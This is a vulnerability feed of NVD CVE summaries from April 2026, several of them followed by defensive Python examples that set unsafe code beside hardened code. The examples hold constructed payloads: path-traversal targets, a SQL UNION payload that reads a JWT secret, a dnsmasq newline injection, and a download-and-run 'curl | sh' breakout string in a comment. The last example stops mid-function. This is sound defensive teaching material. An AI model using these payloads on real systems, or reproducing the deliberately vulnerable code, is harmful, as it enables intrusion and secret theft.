2026-04-07 17:16Z · CRIT

CVE-2026-39305 — PraisonAI: path traversal in the Action Orchestrator lets an action write files outside the workspace (fixed in 1.5.113)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-39305

PraisonAI is a multi-agent teams system. Prior to 1.5.113, the Action Orchestrator feature contains a path traversal vulnerability that allows an attacker (or a compromised agent) to write to arbitrary files outside the configured workspace directory. By supplying relative path segments (../) in the target path, a malicious action can overwrite sensitive system files or drop executable payloads on the host. Fixed in 1.5.113.

CVSS v3.1: 9.0 (CRITICAL) · CWE-22 · Vendor: PraisonAI · Type: Vulnerability · Score: 95
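The confinement the PraisonAI entry describes as missing, shown as an added example (not PraisonAI code): a plain os.path.join beside a resolver that canonicalises the path and checks it stays under the workspace. The function names, the workspace layout and the sample action targets are assumptions made here for illustration.

```python
"""Confining an action's output path to a workspace: the plain join beside a
hardened resolver.

Added example, not PraisonAI code: the function names, the workspace layout
and the sample action targets are assumptions made here for illustration.
"""
import os
import tempfile


def unsafe_target(workspace: str, relative: str) -> str:
    # Plain join: "../" segments walk out of the workspace, and an absolute
    # `relative` replaces it entirely.
    return os.path.join(workspace, relative)


def confined_target(workspace: str, relative: str) -> str:
    """Resolve `relative` inside `workspace`, refusing anything that escapes.

    realpath() resolves symlinks, so a link planted inside the workspace
    cannot be used as a tunnel out of it; commonpath() compares path
    components, so /ws is not fooled by a sibling such as /ws-evil.
    """
    if os.path.isabs(relative) or "\x00" in relative:
        raise ValueError(f"rejected target: {relative!r}")
    root = os.path.realpath(workspace)
    candidate = os.path.realpath(os.path.join(root, relative))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"path escapes workspace: {relative!r}")
    return candidate


def write_action_output(workspace: str, relative: str, data: bytes) -> str:
    """Write an action's file, confined to the workspace; returns the real path."""
    target = confined_target(workspace, relative)
    os.makedirs(os.path.dirname(target), exist_ok=True)
    with open(target, "wb") as fh:
        fh.write(data)
    return target


def demo() -> dict:
    """Run both resolvers over constructed attacker-style targets."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        ws = os.path.join(tmp, "workspace")
        os.makedirs(ws)
        root = os.path.realpath(ws)
        # Constructed payloads, as a malicious action might supply them.
        for p in ["../outside.txt", "../../etc/cron.d/job", "/abs/path", "ok/report.md"]:
            naive = os.path.realpath(unsafe_target(ws, p))
            try:
                confined_target(ws, p)
                blocked = False
            except ValueError:
                blocked = True
            results[p] = {
                "unsafe_escapes": os.path.commonpath([root, naive]) != root,
                "hardened_blocks": blocked,
            }
        # A symlink inside the workspace pointing outside it: a normpath-only
        # prefix check accepts the path, the realpath-based check does not.
        os.symlink(tmp, os.path.join(ws, "link"))
        naive_ok = os.path.normpath(os.path.join(ws, "link/secret")).startswith(ws + os.sep)
        try:
            confined_target(ws, "link/secret")
            blocked = False
        except ValueError:
            blocked = True
        results["symlink"] = {"normpath_accepts": naive_ok, "hardened_blocks": blocked}
        results["written_inside"] = write_action_output(ws, "ok/report.md", b"ok").startswith(root)
    return results
```

The check belongs at the point where the orchestrator turns an action's declared target into a filesystem path, before any directory is created; rejecting absolute paths up front keeps os.path.join from silently discarding the workspace prefix.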
2026-04-07 17:16Z · CRIT

CVE-2026-35614 — Frappe: SQL injection in bulk_update (fixed in 16.14.0 and 15.104.0)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35614

Frappe is a full-stack web application framework. Prior to 16.14.0 and 15.104.0, Frappe has a SQL injection in bulk_update. Fixed in 16.14.0 and 15.104.0.

CVSS v3.1: 9.8 (CRITICAL) · CWE-89 · Vendor: Frappe · Type: Vulnerability · Score: 99
2026-04-07 17:16Z · HIGH

CVE-2026-35610 — PolarLearn: inverted admin check in setCustomPassword and deleteUser lets non-admins run both actions (0-PRERELEASE-14 and earlier)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35610

PolarLearn is a free and open-source learning program. In 0-PRERELEASE-14 and earlier, setCustomPassword(userId, password) and deleteUser(userId) in the account-management module used an inverted admin check. Because of the inverted condition, authenticated non-admin users were allowed to execute both actions, while real admins were rejected. This is a direct privilege-escalation issue in the application.

CVSS v3.1: 8.8 (HIGH) · CWE-285 · Vendor: PolarLearn · Type: Vulnerability · Score: 94
2026-04-07 17:16Z · HIGH

CVE-2026-35607 — File Browser: proxy-auth handler still grants execute permission and Commands to auto-created users (fixed in 2.63.1)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35607

File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to 2.63.1, the fix in commit b6a4fb1 ("self-registered users don't get execute perms") stripped Execute permission and Commands from users created via the signup handler. The same fix was not applied to the proxy auth handler. Users auto-created on first successful proxy-auth login are granted execution capabilities from global default […]

CVSS v3.1: 8.1 (HIGH) · CWE-269 · Type: Vulnerability · Score: 91
2026-04-07 17:16Z · CRIT

CVE-2026-35580 — Emissary: workflow_dispatch inputs interpolated into shell commands in GitHub Actions workflows (fixed in 8.39.0)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35580

Emissary is a P2P based data-driven workflow engine. Prior to 8.39.0, its GitHub Actions workflow files contained shell injection points where user-controlled workflow_dispatch inputs were interpolated directly into shell commands via ${{ }} expression syntax. An attacker with repository write access could inject arbitrary shell commands, leading to repository poisoning and supply chain compromise affecting all downstream users. Fixed in 8.39.0.

CVSS v3.1: 9.1 (CRITICAL) · CWE-77 · Vendor: Emissary · Type: Vulnerability · Score: 96
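The pattern behind the Emissary entry is easy to grep for, so here is an added example (not Emissary's workflows or tooling) of a small scanner that flags ${{ }} expressions referencing user-influenced contexts inside run: steps, plus the env-variable form that removes the injection point. The two workflow snippets are constructed for this example and the list of risky contexts is a starting point, not an exhaustive one.

```python
"""Finding GitHub Actions `run:` steps that paste attacker-influenced
context into the shell through ${{ }}.

Added example, not Emissary's workflows or tooling. The two workflow
snippets are constructed for this example and the list of risky contexts
is a starting point rather than an exhaustive one.
"""
import re

# Contexts whose values come from whoever triggers, opens or comments on
# something in the repository rather than from the workflow author.
RISKY_CONTEXTS = (
    r"github\.event\.inputs\.",
    r"\binputs\.",
    r"github\.event\.issue\.(title|body)",
    r"github\.event\.pull_request\.(title|body)",
    r"github\.event\.pull_request\.head\.ref",
    r"github\.head_ref",
    r"github\.event\.comment\.body",
)
EXPR = re.compile(r"\$\{\{\s*(.*?)\s*\}\}")
RISKY = re.compile("|".join(RISKY_CONTEXTS))
RUN_KEY = re.compile(r"(-\s*)?run:\s*(.*)$")


def find_injection_points(workflow_text: str) -> list:
    """Return (line_no, expression) for each risky ${{ }} inside a run: scalar.

    Tracks `run:` by indentation instead of parsing YAML fully; enough for
    the common `run: |` block form and the single-line form.
    """
    findings = []
    in_run, run_col = False, 0
    for no, line in enumerate(workflow_text.splitlines(), start=1):
        stripped = line.lstrip()
        if not stripped:
            continue
        indent = len(line) - len(stripped)
        if in_run and indent <= run_col:
            in_run = False          # back at the key's column: scalar ended
        m = RUN_KEY.match(stripped)
        if m:
            in_run = True
            run_col = indent + len(m.group(1) or "")   # column of the word "run"
            body = m.group(2)
            if body[:1] in ("|", ">"):
                body = ""           # block scalar: content is on later lines
        else:
            body = stripped if in_run else ""
        for expr in EXPR.findall(body):
            if RISKY.search(expr):
                findings.append((no, expr))
    return findings


# Constructed workflow: the input is substituted into the script text
# before bash ever runs, so a value such as  "; curl x | sh #  breaks out.
VULNERABLE = """\
on:
  workflow_dispatch:
    inputs:
      version:
        description: Version to release
jobs:
  release:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Tag release
        run: |
          echo "Releasing ${{ github.event.inputs.version }}"
          git tag "v${{ github.event.inputs.version }}"
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
"""

# Same step with the value passed through an environment variable: the
# shell expands $VERSION as data and never re-parses its contents.
FIXED = """\
on:
  workflow_dispatch:
    inputs:
      version:
        description: Version to release
jobs:
  release:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Tag release
        env:
          VERSION: ${{ github.event.inputs.version }}
        run: |
          echo "Releasing $VERSION"
          git tag "v$VERSION"
"""
```

Running find_injection_points over VULNERABLE reports lines 13 and 14; over FIXED it reports nothing, because the only remaining expression sits under env:, where the runner assigns it to a variable instead of writing it into the script.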
2026-04-07 17:16Z · HIGH

CVE-2026-27314 — Apache Cassandra: with MutualTlsAuthenticator, ADD IDENTITY lets a user holding only CREATE bind their certificate identity to any role, including superuser (fixed in 5.0.7)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-27314

In Apache Cassandra 5.0 deployments that authenticate with mTLS via MutualTlsAuthenticator, a user with only the CREATE permission can use ADD IDENTITY to associate their own certificate identity with an arbitrary role, including a superuser role, and then authenticate as that role. Upgrade to 5.0.7 or later, which fixes this issue.

CVSS v3.1: 8.8 (HIGH) · CWE-267 · Type: Vulnerability · Score: 94
2026-04-07 17:16Z · CRIT

CVE-2026-23696 — Windmill: SQL injection via the owner parameter in folder ownership management leads to JWT secret disclosure and code execution (CE and EE 1.276.0 through 1.603.2)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-23696

Windmill CE and EE versions 1.276.0 through 1.603.2 contain an SQL injection vulnerability in the folder ownership management functionality that allows authenticated attackers to inject SQL through the owner parameter. An attacker can use the injection to read sensitive data such as the JWT signing secret and administrative user identifiers, forge an administrative token, and then execute arbitrary code via the workflow execution endpoints.

CVSS v3.1: 9.9 (CRITICAL) · CWE-89 · Vendor: Windmill · Type: Vulnerability · Score: 100
2026-04-07 17:16Z · HIGH

CVE-2026-22683 — Windmill (Nextcloud Flow): Operator role restriction not enforced on workspace API endpoints (1.56.0 through 1.614.0)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-22683

Windmill versions 1.56.0 through 1.614.0 contain a missing authorization vulnerability that allows users with the Operator role to perform prohibited entity creation and modification actions via the backend API. Although Operators are documented and priced as unable to create or modify entities, the API does not enforce the Operator restriction on workspace endpoints, allowing an Operator to create and update scripts, flows, apps, and raw_apps. Since Operators can also execute […]

CVSS v3.1: 8.8 (HIGH) · EPSS 51st percentile · CWE-862 · Vendor: Windmill, Nextcloud · Type: Vulnerability · Score: 94
2026-04-07 17:16Z · CRIT

CVE-2024-36058 — Koha: time-based SQL injection via the bib_list parameter of opac-sendbasket.pl (before 23.05.10)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2024-36058

The Send Basket functionality in Koha Library before 23.05.10 is susceptible to time-based SQL injection because it fails to sanitize the POST parameter bib_list in /cgi-bin/koha/opac-sendbasket.pl, allowing library users to read arbitrary data from the database.

CVSS v3.1: 9.8 (CRITICAL) · CWE-89 · Vendor: Koha · Type: Vulnerability · Score: 99
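The Frappe bulk_update, Windmill folder-ownership and Koha Send Basket entries above are the same defect in three code bases: a request parameter spliced into query text. As an added example serving all three (not code from any of those projects), here is a string-built lookup beside its parameterised form and a parameterised IN-list for the bulk-update case, run against an in-memory SQLite database. The table layout, the owner parameter and the secret value are constructed here.

```python
"""String-built SQL beside a parameterised query, run against an in-memory
SQLite database seeded with constructed data.

Added example, not Frappe, Windmill or Koha code. Table and column names,
the "owner" parameter and the secret value are assumptions made here.
"""
import sqlite3


def seed() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE folder_owners (folder TEXT, owner TEXT);
        INSERT INTO folder_owners VALUES ('f1', 'u:alice'), ('f2', 'u:bob');
        CREATE TABLE global_settings (name TEXT, value TEXT);
        INSERT INTO global_settings VALUES ('jwt_secret', 'CONSTRUCTED-SECRET');
        """
    )
    return conn


def folders_owned_by_unsafe(conn, owner: str) -> list:
    # Interpolating the request parameter into the statement hands the
    # caller control over the query text.
    sql = f"SELECT folder FROM folder_owners WHERE owner = '{owner}' ORDER BY folder"
    return [row[0] for row in conn.execute(sql)]


def folders_owned_by(conn, owner: str) -> list:
    # A placeholder keeps the value out of the parser: the driver binds it as
    # data, so quotes and UNION inside it are never interpreted.
    sql = "SELECT folder FROM folder_owners WHERE owner = ? ORDER BY folder"
    return [row[0] for row in conn.execute(sql, (owner,))]


def bulk_update(conn, folders: list, new_owner: str) -> int:
    """Parameterised IN-list: one placeholder per element, values bound apart.

    The f-string only ever inserts a run of "?" marks; nothing user-supplied
    reaches the statement text.
    """
    if not folders:
        return 0
    marks = ",".join("?" * len(folders))
    cur = conn.execute(
        f"UPDATE folder_owners SET owner = ? WHERE folder IN ({marks})",
        (new_owner, *folders),
    )
    return cur.rowcount


# Constructed payload: closes the string, appends a UNION that reads another
# table, and comments out the trailing quote.
PAYLOAD = "x' UNION SELECT value FROM global_settings WHERE name='jwt_secret' -- "


def demo() -> dict:
    conn = seed()
    return {
        "unsafe": folders_owned_by_unsafe(conn, PAYLOAD),
        "safe": folders_owned_by(conn, PAYLOAD),
        "normal": folders_owned_by(conn, "u:alice"),
    }
```

The chain in the Windmill description (read the signing secret, forge an admin token, reach the execution endpoints) starts with exactly the kind of query the UNION payload returns here; the Koha variant is blind and time-based, which changes how the data comes back, not whether it does.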
2026-04-07 16:16Z · HIGH

CVE-2026-35521 — FTLDNS: newline injection through the dhcp.hosts setting adds arbitrary dnsmasq directives and leads to command execution (6.0 to before 6.6)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35521

FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a remote code execution (RCE) vulnerability in the DHCP hosts configuration parameter (dhcp.hosts): an authenticated attacker can inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. […]

CVSS v3.1: 8.8 (HIGH) · CWE-78, CWE-93 · Vendor: FTLDNS · Type: Vulnerability · Score: 94
2026-04-07 16:16Z · HIGH

CVE-2026-35520 — FTLDNS: newline injection through the dhcp.leaseTime setting adds arbitrary dnsmasq directives and leads to command execution (6.0 to before 6.6)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35520

FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a remote code execution (RCE) vulnerability in the DHCP lease time configuration parameter (dhcp.leaseTime): an authenticated attacker can inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. […]

CVSS v3.1: 8.8 (HIGH) · CWE-78, CWE-93 · Vendor: FTLDNS · Type: Vulnerability · Score: 94
2026-04-07 16:16Z · HIGH

CVE-2026-35519 — FTLDNS: newline injection through the dns.hostRecord setting adds arbitrary dnsmasq directives and leads to command execution (6.0 to before 6.6)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35519

FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a remote code execution (RCE) vulnerability in the DNS host record configuration parameter (dns.hostRecord): an authenticated attacker can inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. […]

CVSS v3.1: 8.8 (HIGH) · CWE-78, CWE-93 · Vendor: FTLDNS · Type: Vulnerability · Score: 94
2026-04-07 16:16Z · HIGH

CVE-2026-35518 — FTLDNS: newline injection through the dns.cnameRecords setting adds arbitrary dnsmasq directives and leads to command execution (6.0 to before 6.6)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35518

FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a remote code execution (RCE) vulnerability in the DNS CNAME records configuration parameter (dns.cnameRecords): an authenticated attacker can inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. […]

CVSS v3.1: 8.8 (HIGH) · CWE-78, CWE-93 · Vendor: FTLDNS · Type: Vulnerability · Score: 94
2026-04-07 16:16Z · HIGH

CVE-2026-35517 — FTLDNS: newline injection through the dns.upstreams setting adds arbitrary dnsmasq directives and leads to command execution (6.0 to before 6.6)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35517

FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a remote code execution (RCE) vulnerability in the upstream DNS servers configuration parameter (dns.upstreams): an authenticated attacker can inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. […]

CVSS v3.1: 8.8 (HIGH) · CWE-78, CWE-93 · Vendor: FTLDNS · Type: Vulnerability · Score: 94
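The five FTLDNS entries above (CVE-2026-35517 through CVE-2026-35521) share one mechanism: a setting value that reaches the generated dnsmasq configuration with its line breaks intact, so one API field becomes two directives. As an added example serving all five (not pihole-FTL code), here is a verbatim renderer beside per-field validators that parse each value as the type it is supposed to be. The setting names, the rendering functions and the payload are assumptions made here; the dnsmasq options used (dhcp-host, server, dhcp-script) are real options chosen only to illustrate the technique.

```python
"""Rendering a dnsmasq directive from an API-supplied value: the newline
injection beside an allow-list validator.

Added example, not pihole-FTL code. The setting names, rendering functions
and payloads are assumptions made here; the dnsmasq options used
(dhcp-host, server, dhcp-script) are real but chosen only for illustration.
"""
import ipaddress
import re

# Each field gets its own grammar; none of them admits a line break, so a
# value can never close one directive and open another.
_MAC = re.compile(r"[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}")
_HOSTNAME = re.compile(r"[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?")


def render_unsafe(directive: str, value: str) -> str:
    # Whatever the API caller supplied lands in the config file verbatim.
    return f"{directive}={value}\n"


def _no_control_chars(value: str) -> str:
    if any(ch in value for ch in "\r\n\x00"):
        raise ValueError(f"control character in {value!r}")
    return value


def render_dhcp_host(mac: str, ip: str, name: str) -> str:
    """dhcp-host=<mac>,<ip>,<name> with every field validated.

    fullmatch() is used rather than match() with "$", because "$" would
    still accept a value that ends in a newline.
    """
    if not _MAC.fullmatch(mac):
        raise ValueError(f"bad MAC {mac!r}")
    ipaddress.ip_address(ip)  # raises ValueError on anything that is not an IP
    if not _HOSTNAME.fullmatch(name):
        raise ValueError(f"bad hostname {name!r}")
    return f"dhcp-host={mac},{ip},{name}\n"


def render_upstream(server: str) -> str:
    """server=<ip>[#port]: the upstream is parsed as an address, not copied."""
    host, _, port = _no_control_chars(server).partition("#")
    ipaddress.ip_address(host)
    if port and not (port.isdigit() and 0 < int(port) < 65536):
        raise ValueError(f"bad port {port!r}")
    return f"server={server}\n"


# Constructed payload: a hostname with an embedded newline, so one setting
# turns into two directives, the second of which makes dnsmasq run a script.
PAYLOAD = "printer\ndhcp-script=/tmp/evil.sh"


def demo() -> dict:
    unsafe = render_unsafe("dhcp-host", f"aa:bb:cc:dd:ee:ff,192.168.1.50,{PAYLOAD}")
    try:
        render_dhcp_host("aa:bb:cc:dd:ee:ff", "192.168.1.50", PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return {
        "unsafe_directives": unsafe.splitlines(),
        "hardened_blocks": blocked,
        "good": render_dhcp_host("aa:bb:cc:dd:ee:ff", "192.168.1.50", "printer").strip(),
        "upstream": render_upstream("1.1.1.1#5353").strip(),
    }
```

A generic "strip newlines" filter would close this particular hole, but parsing each field as an address, MAC or hostname also rejects the next separator someone finds; the validation belongs in the API layer, before the value is persisted, not in the config writer.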
2026-04-07 16:16Z · CRIT

CVE-2026-35490 — changedetection.io: @login_optionally_required placed outside @blueprint.route() leaves routes unauthenticated (fixed in 0.54.8)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35490

changedetection.io is a free open source web page change detection tool. Prior to 0.54.8, the @login_optionally_required decorator is placed before (outer to) @blueprint.route() instead of after it. In Flask, @route() must be the outermost decorator because it registers the function it receives. When the order is reversed, @route() registers the original undecorated function, and the auth wrapper is never in the call chain. This silently disables authentication on these route […]

CVSS v3.1: 9.8 (CRITICAL) · CWE-863 · Vendor: changedetection.io · Type: Vulnerability · Score: 99
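The decorator-order mistake in the changedetection.io entry, reproduced as an added example (not changedetection.io code) together with a registry check that catches it. MiniBlueprint is a stand-in for Flask's Blueprint that mimics the one property that matters here: route() registers exactly the function object it is handed and returns it unchanged. With real Flask the same check iterates app.view_functions; the marker attribute and the route names are assumptions made here.

```python
"""Decorator order on routes: why the auth wrapper must sit inside route(),
plus a registry check that catches the inverted order.

Added example, not changedetection.io code. MiniBlueprint stands in for
Flask's Blueprint: route() registers the function object it receives.
"""
import functools


class MiniBlueprint:
    def __init__(self):
        self.view_functions = {}

    def route(self, rule):
        def register(fn):
            self.view_functions[rule] = fn   # registers *this* object, as Flask does
            return fn
        return register


def login_optionally_required(fn):
    """Reject the request unless it carries an authenticated user."""
    @functools.wraps(fn)
    def wrapper(request):
        if not request.get("user"):
            return 401, "unauthorized"
        return fn(request)
    wrapper._auth_protected = True   # marker the registry check looks for
    return wrapper


bp = MiniBlueprint()


@login_optionally_required           # outer: wraps the function...
@bp.route("/wrong-order")            # ...but route() already registered the bare one
def wrong_order(request):
    return 200, "secret data"


@bp.route("/right-order")            # outer: registers the wrapped function
@login_optionally_required
def right_order(request):
    return 200, "secret data"


def dispatch(blueprint, rule, request):
    """What the framework calls for an incoming request: the registered object."""
    return blueprint.view_functions[rule](request)


def unprotected_routes(blueprint, allow=()) -> list:
    """CI check: every registered view must carry the auth marker unless listed."""
    return sorted(
        rule for rule, fn in blueprint.view_functions.items()
        if rule not in allow and not getattr(fn, "_auth_protected", False)
    )
```

The name wrong_order in the module does point at the wrapped function, which is why the bug is silent: only the object stored in the registry is ever called. The registry check makes the omission a test failure rather than an exposed endpoint.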
2026-04-07 16:16Z · HIGH

CVE-2026-35488 — Tandoor Recipes: CustomIsShared grants shared users write and delete access to recipe books (fixed in 2.6.4)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35488

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Prior to 2.6.4, RecipeBookViewSet and RecipeBookEntryViewSet use CustomIsShared as an alternative permission class, but CustomIsShared.has_object_permission() returns True for all HTTP methods, including DELETE, PUT and PATCH, without checking request.method against SAFE_METHODS. Any user who is in the shared list of a RecipeBook can delete or overwrite it, even though shared […]

CVSS v3.1: 8.1 (HIGH) · CWE-749 · Vendor: Tandoor · Type: Vulnerability · Score: 91
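The PolarLearn entry (an inverted admin check) and the Tandoor entry above (an object permission that ignores the HTTP method) are both caught by the same kind of test: an authorization matrix that states the expected answer for every (subject, action) pair and diffs the permission code against it. Added example serving both entries, not PolarLearn or Tandoor code: the user and request model, the class names and the expected-access table are assumptions made here; SAFE_METHODS mirrors Django REST framework's tuple.

```python
"""An authorization matrix test that catches both bugs: an inverted admin
check and an object permission that ignores the HTTP method.

Added example, not PolarLearn or Tandoor code. The user/request model,
class names and expected-access table are assumptions made here.
"""
from dataclasses import dataclass, field

SAFE_METHODS = ("GET", "HEAD", "OPTIONS")   # as in Django REST framework
WRITE_METHODS = ("GET", "PUT", "PATCH", "DELETE")


@dataclass
class User:
    name: str
    is_admin: bool = False


@dataclass
class Request:
    user: User
    method: str = "GET"


@dataclass
class RecipeBook:
    owner: User
    shared: list = field(default_factory=list)


# --- PolarLearn-style bug: the condition is inverted -------------------------
def can_manage_account_buggy(actor: User) -> bool:
    return not actor.is_admin            # non-admins pass, admins are rejected


def can_manage_account(actor: User) -> bool:
    return actor.is_admin


# --- Tandoor-style bug: shared access ignores the method ---------------------
class IsSharedBuggy:
    def has_object_permission(self, request, obj) -> bool:
        # Owner or anyone in the shared list, for every method.
        return request.user == obj.owner or request.user in obj.shared


class IsShared:
    def has_object_permission(self, request, obj) -> bool:
        if request.user == obj.owner:
            return True
        return request.method in SAFE_METHODS and request.user in obj.shared


def object_matrix(perm_cls, book, users, methods=WRITE_METHODS) -> dict:
    """Evaluate one permission class over every (user, method) pair."""
    perm = perm_cls()
    return {(u.name, m): perm.has_object_permission(Request(u, m), book)
            for u in users for m in methods}


def audit() -> dict:
    """Diff each implementation against the table of intended access."""
    alice, bob, eve = User("alice"), User("bob"), User("eve")
    root = User("root", is_admin=True)
    book = RecipeBook(owner=alice, shared=[bob])
    users = [alice, bob, eve]
    # Intended policy: the owner does anything; a shared user only reads.
    expected = {(u.name, m): (u is alice) or (u is bob and m in SAFE_METHODS)
                for u in users for m in WRITE_METHODS}

    def diff(perm_cls):
        return sorted(k for k, v in object_matrix(perm_cls, book, users).items()
                      if v != expected[k])

    return {
        "buggy_object_diff": diff(IsSharedBuggy),
        "fixed_object_diff": diff(IsShared),
        "buggy_admin": (can_manage_account_buggy(root), can_manage_account_buggy(bob)),
        "fixed_admin": (can_manage_account(root), can_manage_account(bob)),
    }
```

The matrix is the artefact worth keeping: the expected table is written once from the product's documented sharing rules, and every later permission class or helper is checked against it, so a flipped condition or a missing method check shows up as a named (user, method) pair rather than as a report.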
2026-04-07 16:16Z · CRIT

CVE-2026-33816 — jackc/pgx: memory-safety vulnerability in github.com/jackc/pgx/v5

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-33816

Memory-safety vulnerability in github.com/jackc/pgx/v5.

CVSS v3.1: 9.8 (CRITICAL) · Vendor: pgx project · Type: Vulnerability · Score: 99
2026-04-07 16:16Z · CRIT

CVE-2026-33815 — jackc/pgx: memory-safety vulnerability in github.com/jackc/pgx/v5

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-33815

Memory-safety vulnerability in github.com/jackc/pgx/v5.

CVSS v3.1: 9.8 (CRITICAL) · Vendor: pgx project · Type: Vulnerability · Score: 99
2026-04-07 16:16Z · HIGH

CVE-2026-30460 — Daylight Studio FuelCMS: authenticated remote code execution in the Blocks module (v1.5.2)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-30460

Daylight Studio FuelCMS v1.5.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability in the Blocks module.

CVSS v3.1: 8.8 (HIGH) · CWE-94 · Vendor: Daylight Studio · Type: Vulnerability · Score: 94
2026-04-07 16:16Z · CRIT

CVE-2025-52908 — Samsung Exynos: buffer overflow in the Wi-Fi driver's NL80211 vendor command handling via an ioctl message (issue 1 of 2)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2025-52908

An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor and Wearable Processor Exynos 980, 850, 1280, 1330, 1380, 1480, 1580, W920, W930, and W1000. Incorrect handling of the NL80211 vendor command leads to a buffer overflow via a certain ioctl message (issue 1 of 2).

CVSS v3.1: 9.8 (CRITICAL) · CWE-120 · Vendor: Samsung · Type: Vulnerability · Score: 99
2026-04-07 16:16Z · HIGH

CVE-2025-24818 — Nokia MantaRay NM: OS command injection in the Log Search application

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2025-24818

Nokia MantaRay NM is vulnerable to OS command injection due to improper neutralization of special elements used in an OS command in the Log Search application.

CVSS v3.1: 8.0 (HIGH) · CWE-77 · Vendor: Nokia · Type: Vulnerability · Score: 90
2026-04-07 16:16Z · HIGH

CVE-2025-24817 — Nokia MantaRay NM: OS command injection in the Symptom Collector application

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2025-24817

Nokia MantaRay NM is vulnerable to OS command injection due to improper neutralization of special elements used in an OS command in the Symptom Collector application.

CVSS v3.1: 8.0 (HIGH) · CWE-78 · Vendor: Nokia · Type: Vulnerability · Score: 90
2026-04-07 16:16Z · CRIT

CVE-2024-36057 — Koha: unsanitized upload filenames passed to a shell unzip command in upload-cover-image.pl give remote code execution (before 23.05.10)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2024-36057

Koha Library before 23.05.10 fails to sanitize user-controllable filenames prior to unzipping, leading to remote code execution. The line "qx/unzip $filename -d $dirname/;" in upload-cover-image.pl is vulnerable to command injection via shell metacharacters: the input is attacker-controlled and is included directly in a system command, so an attack can occur via a malicious filename after uploading a .zip file and clicking Process Images.

CVSS v3.1: 9.8 (CRITICAL) · CWE-94 · Vendor: Koha · Type: Vulnerability · Score: 99
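The qx/unzip $filename .../ line in the Koha entry is a shell string, so the shell parses the filename. As an added example (not Koha code, which is Perl), here is the same pattern in Python beside the argv form plus an allow-list on the upload name; ls stands in for unzip so the block runs on any POSIX system, and the upload directory and file names are constructed here.

```python
"""Spawning a tool on an uploaded filename: the shell string beside argv.

Added example, not Koha code (Koha's is Perl). `ls` stands in for unzip so
the block runs anywhere with a POSIX shell; the upload directory and the
file names are constructed here.
"""
import os
import re
import subprocess
import tempfile

# Upload names: a leading alphanumeric, then a short allow-list; no spaces,
# no shell metacharacters, no leading "-" that a tool could read as an option.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")


def run_unsafe(filename: str, dirname: str) -> str:
    # Equivalent of Perl's qx/.../: the command line is handed to /bin/sh,
    # so metacharacters inside the filename become commands.
    cmd = f"ls {filename} {dirname}"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


def safe_upload_name(filename: str) -> str:
    """Keep only the basename and require it to match the allow-list."""
    name = os.path.basename(filename)
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected upload name {filename!r}")
    return name


def run_safe(filename: str, dirname: str) -> str:
    name = safe_upload_name(filename)
    # argv form: no shell, each list element is exactly one argument, and
    # "--" ends option parsing for the tool itself.
    out = subprocess.run(["ls", "--", os.path.join(dirname, name)],
                         capture_output=True, text=True)
    return out.stdout


def demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        good = "covers.zip"
        open(os.path.join(tmp, good), "wb").close()
        # Constructed malicious upload name: ends the command, runs another.
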